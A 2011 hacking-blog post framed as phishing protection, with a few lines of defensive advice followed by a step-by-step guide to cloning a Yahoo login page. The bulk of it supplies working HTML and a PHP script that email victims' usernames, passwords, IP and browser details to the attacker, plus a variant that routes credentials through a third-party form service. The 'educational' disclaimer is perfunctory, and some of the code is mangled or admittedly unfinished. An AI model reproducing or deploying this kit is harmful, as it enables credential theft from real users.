Welcome to my site. Please CLICK HERE to give your opinions regarding this new look of "PCTipsbyAnu". Thanks for visiting.

Monday, February 21, 2011

Browse » Home » , , , , » How to protect from being hacked via phishing?

How to protect from being hacked via phishing?

Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging,

Protect Yourself

Rather than using the provided link in the email, you should copy the link and email it to the legitimate company or business, asking if the email is legitimate. If it is frudlante this could help shut down phisher faster.
Only use the address that you have used before, or start at your normal homepage.
Most companies require you to log in to a secure site. Look for the lock at the bottom of your browser and “https” in front of the Website address.

Know what Hackers Do !

This section Tells u what Hackers Do which is Known as Phishing, It is Completely Illegal never ever Try it.. This Article is meant for Educational Purpose !

This is how Bad Hackers make a fake login page(Completely Illegal) that will email you the name and password that is entered on that page.. To do this you will need some web language experiance.
First you will need to get a copy of the source code of the site. so go to the login page then click file > save as > and save the page as "html only" or right click and select "view source" then copy and past it to a notepad file on your desktop and save it as login.html. either way youl need a copy of the login.html on your desktop.
now you will need to make sure all of the images on the page are linking to a valid URL. what you need to do is look for links like


<img src=/pics/pic.jpg>

And they change them to


<img src=http://www.domain.com/pics/pic.jpg>

or save all the images and host them on your own image hosting account.

Then check your page by opening it in your browser to make sure it looks like the real page with all the images showing up.
Now we have to enter the script that will mail us the name and pass. you have to look through your login.html and find the section of code that creates the login boxs and delete it. On Yahoo login this is the part of the source that needs to be replaced.


<table border="0" cellpadding="2" cellspacing="0"> <tr> <td align="right" nowrap><font face="arial" size="-1"> Yahoo! ID: </font></td> <td><input name="login" size="17" value=""></td> </tr> <tr> <td align="right" nowrap><font face="arial" size="-1">Password:</font></td> <td><input name="passwd" type="password" size="17" maxlength="32"></td></tr> <tr> <td colspan="2" nowrap align="center"><font face="arial" size="-1">

Now, this can be replaced by one of two things. If you understand PHP you could use a php mailing script as long as you have a host that allows the mail function or an apache server to host it on. Using php require 2 files. 

The login.html and thanks.php To use php replace the previous login script shown above with the following html.


<html> <form method="POST" action="thanks.php"> Yahoo! ID <input type="TEXT" name="name"> <br> Password <input type="PASSWORD" name="password"> <br> <input type="SUBMIT" name="Submit" value="Login"> </form> </html>

And in the same folder put this script (unedited) to actually grab the entered info and mail it to you. thanks.php


<script LANGUAGE="php"> $email = $HTTP_POST_VARS[email]; $mailto = "Your Email Goes Here"; $mailsubj = "Form submission"; $mailhead = "From: $emailn"; reset ($HTTP_POST_VARS); $mailbody =$_SERVER['REQUEST_URI'] . "." .$_SERVER['HTTP_USER_AGENT'] . "." . "$REMOTE_ADDR.".".Values submitted from web site form:n"; while (list ($key, $val) = each ($HTTP_POST_VARS)) { $mailbody .= "$key : $valn"; } mail($mailto, $mailsubj, $mailbody, $mailhead); </SCRIPT>

They Call the second script thanks.php 

This script will send Hackers your name, password, ip, operating system, and browser type to you in the email.

Now the second method isnt as good but can be hosted on ANY host, all they need to do is allow html which all hosts do. so this method can be hosted on a geocities account. You need to go to /http://www.response-o-matic.com and get thier free email script that can be dropped into any html.

You need to alter the script for it to work. I dont have an altered script at hand but if you guys dont have a host that allows php and the mail() function ill get the respocomatic script tomorow and edit it for you and post it here ready for you to drop straight ontop of the orriginal yahoo login code thats higlighted at the top of this page. its morning now and i'm tired lol.

This is the responcomatic code that you can drop over the login code on your login page. Just enter your email

<HTML> <BODY BGCOLOR="#FFFFFF"> <FORM action="http://www.response-o-matic.com/cgi-bin/rom.pl" method="POST"> <H3><CENTER> <INPUT TYPE="hidden" NAME="your_email_address" VALUE="YOUR_EMAIL@DOMAIN.COM"> <INPUT TYPE="hidden" NAME="your_name" VALUE="password"> <INPUT TYPE="hidden" NAME="email_subject_line" VALUE="My Password"> <INPUT TYPE="hidden" NAME="required_fields" VALUE="your_email_address"> <INPUT TYPE="hidden" NAME="thank_you_title" VALUE="You are being redirected"> <INPUT TYPE="hidden" NAME="return_link_url" VALUE="http://www.yahoo.com"> <INPUT TYPE="hidden" NAME="return_link_name" VALUE="CLICK HERE"> <INPUT TYPE="hidden" NAME="background_color" VALUE="#000000"> <INPUT TYPE="hidden" NAME="text_color" VALUE="#000000"> <INPUT TYPE="hidden" NAME="link_color" VALUE="#FF0000"> <INPUT TYPE="hidden" NAME="visited_link_color" VALUE="#FF0000"> <INPUT TYPE="hidden" NAME="active_link_color" VALUE="#FF0000"> </CENTER></H3> <H4>&nbsp;</H4> <BLOCKQUOTE><P><TABLE BORDER=0 CELLSPACING=0> <TR> <TD WIDTH=116> <b>Yahoo Name</b> </TD><TD> <INPUT TYPE="text" NAME="visitor_name" VALUE="" SIZE=20> </TD></TR> <TR> <TD WIDTH=116> <b>Password</b> </TD><TD> <INPUT TYPE="password" NAME="visitor_email_address" VALUE="" SIZE=20> </TD></TR> </TABLE></P> <BLOCKQUOTE><P><INPUT TYPE="submit" NAME=Submit" VALUE="Login"></P></BLOCKQUOTE> <P>&nbsp;</P> </FORM> </BODY> </HTML>

Where it says YOUR_EMAIL@DOMAIN.COM Hackers change that to the email They want the pass to be sent. . this isnt the finished script it still needs some work but its pretty much all done.

You can leave a response, or trackback from your own site.

About 'Anu': My name is 'Anu' also Known as 'ANU 007 TIGER' .I'm administrator of 'PC Tips by Anu' blog .This blog was opened for sharing contents about hacking n cracking.


Post a Comment

Back to Top